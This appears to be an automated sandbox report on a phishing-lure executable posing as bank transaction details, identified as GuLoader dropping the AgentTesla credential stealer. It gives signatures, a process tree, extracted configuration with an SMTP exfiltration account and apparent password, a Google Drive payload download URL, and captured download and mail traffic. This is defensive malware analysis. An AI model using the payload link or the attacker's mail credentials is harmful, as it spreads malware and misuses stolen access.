Loading ...

Play interactive tourEdit tour

Windows Analysis Report PKO_TRANS_DETAILS_20211216_0809521.exe

Overview

General Information

Sample Name:PKO_TRANS_DETAILS_20211216_0809521.exe
Analysis ID:540990
MD5:1823b507e96d8138bada7c65d424abcc
SHA1:e5d7884da7d17ba0ae592ff787e84ae665e21c3a
SHA256:99b81b452d173986229ed512383e05214f35c819aa9da4c2a972bb05c880d536
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • PKO_TRANS_DETAILS_20211216_0809521.exe (PID: 2888 cmdline: "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" MD5: 1823B507E96D8138BADA7C65D424ABCC)
    • CasPol.exe (PID: 6124 cmdline: "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4076 cmdline: "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "ahmed.kendrick@yandex.comprisonbreak22smtp.yandex.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1byST7nT"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000002.00000002.329868071073.0000000002B70000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 4076JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1byST7nT"}
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe.2888.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ahmed.kendrick@yandex.comprisonbreak22smtp.yandex.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeVirustotal: Detection: 20%Perma Link
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49838 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1byST7nT
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-10-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49847 -> 77.88.21.158:587
            Source: global trafficTCP traffic: 192.168.11.20:49847 -> 77.88.21.158:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: Cookies.11.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 0000000B.00000003.330833250110.0000000021391000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330833381633.000000002139A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300002633.000000001DE57000.00000004.00000001.sdmp, Cookies.11.drString found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
            Source: Cookies.11.drString found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ca.crl0h
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330770323782.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286764371.0000000000DDD000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330770323782.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286764371.0000000000DDD000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpString found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
            Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpString found in binary or memory: http://eVxhAq.com
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ca.cer09
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ycasha2.cer0
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmpString found in binary or memory: http://smtp.yandex.com
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com0.
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpString found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpString found in binary or memory: http://yandex.ocsp-responder.com03
            Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-10-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-10-docs.googleusercontent.com/2
            Source: CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo34
            Source: CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.329840243016.0000000000DDD000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC
            Source: CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC;
            Source: CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/~
            Source: CasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334299831843.000000001DE3A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330774864610.000000001CC31000.00000004.00000001.sdmpString found in binary or memory: https://ffT40WCIhVVniAbESQ.com
            Source: CasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmpString found in binary or memory: https://ffT40WCIhVVniAbESQ.comt-
            Source: CasPol.exe, 0000000B.00000002.334299040887.000000001DDB6000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 0000000B.00000002.334298573763.000000001DD56000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 0000000B.00000002.334299040887.000000001DDB6000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpString found in binary or memory: https://www.certum.pl/CPS0
            Source: CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-10-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49838 version: TLS 1.2
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeCode function: 2_2_00401E86
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00AD1130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00ADBA78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00AD3A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00AD4320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00ADC7D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00AD3708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00F888C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00F8B1C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00F82D78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FBACB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FBF898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FBB004
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB7D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB5AD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB1228
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB9B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB1EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FB67D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC52B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC5B91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FCB4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC8615
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC3330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FCB49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1DB35D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1DB34394
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1DB35CC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1DB369D0
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess Stats: CPU usage > 98%
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329866775514.0000000000425000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDagins.exe vs PKO_TRANS_DETAILS_20211216_0809521.exe
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeBinary or memory string: OriginalFilenameDagins.exe vs PKO_TRANS_DETAILS_20211216_0809521.exe
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeVirustotal: Detection: 20%
            Source: PKO_TRANS_DETAILS_20211216_0809521.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\u2trkkyb.crcJump to behavior
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeFile created: C:\Users\user\AppData\Local\Temp\~DF96836616C4B0B991.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
